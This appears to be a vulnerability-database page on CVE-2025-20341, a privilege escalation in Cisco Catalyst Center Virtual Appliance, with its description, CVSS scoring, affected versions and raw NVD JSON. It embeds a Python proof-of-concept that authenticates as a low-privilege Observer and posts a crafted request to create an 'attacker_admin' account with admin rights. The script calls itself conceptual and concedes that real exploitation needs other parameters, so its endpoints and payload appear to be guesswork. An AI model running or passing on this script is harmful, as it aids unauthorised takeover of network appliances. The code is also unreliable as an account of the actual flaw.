Security Vulnerability Report
中文
CVE-2025-20341 CVSS 8.8 HIGH

CVE-2025-20341

Published: 2025-11-13 17:15:45
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

A vulnerability in Cisco Catalyst Center Virtual Appliance could allow an authenticated, remote attacker to elevate privileges to Administrator on an affected system. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by submitting a crafted HTTP request to an affected system. A successful exploit could allow the attacker to perform unauthorized modifications to the system, including creating new user accounts or elevating their own privileges on an affected system. To exploit this vulnerability, the attacker must have valid credentials for a user account with at least the role of Observer.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Cisco Catalyst Center Virtual Appliance < 2.3.7.6
Cisco Catalyst Center Virtual Appliance 2.3.7.x < 2.3.7.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-20341 PoC - Cisco Catalyst Center Privilege Escalation Note: This is a conceptual PoC for educational and security testing purposes only. """ import requests import json from urllib.parse import urljoin class CVE_2025_20341_PoC: def __init__(self, target_url, username, password): self.target_url = target_url.rstrip('/') self.username = username self.password = password self.session = requests.Session() self.token = None def authenticate(self): """Authenticate with valid credentials (Observer role minimum)""" login_url = urljoin(self.target_url, '/api/v1/auth/login') payload = { 'username': self.username, 'password': self.password } try: response = self.session.post(login_url, json=payload, timeout=30) if response.status_code == 200: data = response.json() self.token = data.get('token') return True except Exception as e: print(f"Authentication failed: {e}") return False def privilege_escalation(self): """Attempt privilege escalation by creating admin user or elevating privileges""" if not self.token: print("Not authenticated") return False # Target endpoint for privilege escalation api_endpoint = urljoin(self.target_url, '/api/v1/users') headers = { 'Authorization': f'Bearer {self.token}', 'Content-Type': 'application/json' } # Crafted payload to create admin user or escalate privileges # Note: Actual exploitation requires specific parameter manipulation escalation_payload = { 'username': 'attacker_admin', 'password': 'P@ssw0rd123!', 'role': 'admin', # Additional parameters that bypass input validation 'privileges': { 'admin': True, 'system_config': True } } try: response = self.session.post(api_endpoint, json=escalation_payload, headers=headers, timeout=30) if response.status_code in [200, 201]: print("Privilege escalation successful - Admin user created") return True else: print(f"Privilege escalation failed: {response.status_code}") except Exception as e: print(f"Exploitation error: {e}") return False def exploit(self): """Execute full exploit chain""" print(f"[*] Targeting: {self.target_url}") print(f"[*] Authenticating as: {self.username}") if self.authenticate(): print("[+] Authentication successful") print("[*] Attempting privilege escalation...") return self.privilege_escalation() else: print("[-] Authentication failed") return False if __name__ == "__main__": # Configuration TARGET = "https://cisco-catalyst-center.local" USERNAME = "observer_user" PASSWORD = "ObserverPass123!" poc = CVE_2025_20341_PoC(TARGET, USERNAME, PASSWORD) poc.exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-20341", "sourceIdentifier": "[email protected]", "published": "2025-11-13T17:15:45.400", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in Cisco Catalyst Center Virtual Appliance could allow an authenticated, remote attacker to elevate privileges to Administrator on an affected system.\r\n\r\nThis vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by submitting a crafted HTTP request to an affected system. A successful exploit could allow the attacker to perform unauthorized modifications to the system, including creating new user accounts or elevating their own privileges on an affected system. To exploit this vulnerability, the attacker must have valid credentials for a user account with at least the role of Observer."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-catc-priv-esc-VS8EeCuX", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.